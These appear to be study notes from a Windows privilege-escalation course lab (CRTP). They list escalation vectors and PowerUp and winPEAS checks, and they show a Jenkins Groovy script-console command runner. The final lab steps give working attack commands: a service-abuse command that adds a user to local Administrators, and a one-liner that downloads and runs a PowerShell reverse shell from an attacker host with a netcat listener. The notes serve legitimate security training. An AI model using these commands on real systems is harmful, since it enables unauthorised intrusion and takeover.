2 - Win Privesc

Win Privesc - Local

The material of CRTP about Local Privesc is not great

There are various ways of locally escalating privileges on Windows box:

– Missing patches
– Automated deployment and AutoLogon passwords in clear text
– AlwaysInstallElevated (Any user can run MSI as SYSTEM)
– Misconfigured Services
– DLL Hijacking and more
– NTLM Relaying a.k.a. Won't Fix

We can use below tools for complete coverage:

PowerSploit - Privesc Module

Privesc on GitHub

winPEAS in PEASS-ng

Services Issues using PowerUp

Get services with unquoted paths and a space in their name:

Get-ServiceUnquoted -Verbose

Get services where the current user can write to its binary path or change arguments to the binary:

Get-ModifiableServiceFile -Verbose

Get the services whose configuration current user can modify:

Get-ModifiableService -Verbose

Run all checks with automated tools :

# PowerUp:
Invoke-AllChecks

# Privesc:
Invoke-PrivEsc

# PEASS-ng:
winPEASx64.exe

Feature Abuse

- If you have Admin access (default installation before 2.x), go to http://<jenkins_server>/script
- In the script console, Groovy scripts could be executed.

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '
[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

If you don’t have admin access but could add or edit build steps in the build configuration. Add a build step, add “Execute Windows Batch Command” and enter:

powershell -c <command>

Again, you could download and execute scripts, run encoded scripts and more.

Learning Objective 5:

• Exploit a service and elevate privileges to local administrator.
• Identify a machine in the domain where ur user has local administrative access.
• Using privileges of a user on Jenkins get admin privileges on another server.

[easy to detect]

Invoke-ServiceAbuse -Name 'AbyssWebServer' -Username dcorp\studentx -Verbose
net localgroup Administrators

[easy to detect - noise]

Find-PSRemotingLocalAdminAccess

on Jenkins> powershell iex (iwr -UseBasicParsing http://172.16.100.1/Invoke-PowerShellTcp.ps1); power -Reverse -IPAddress 172.16.100.1 -Port 443
on Attacker> host the file in a webserver - example: HFS - HTTP File Server 

disable firewall or add exception

on Attacker> netcat-win32-1.12.exe -lvp 443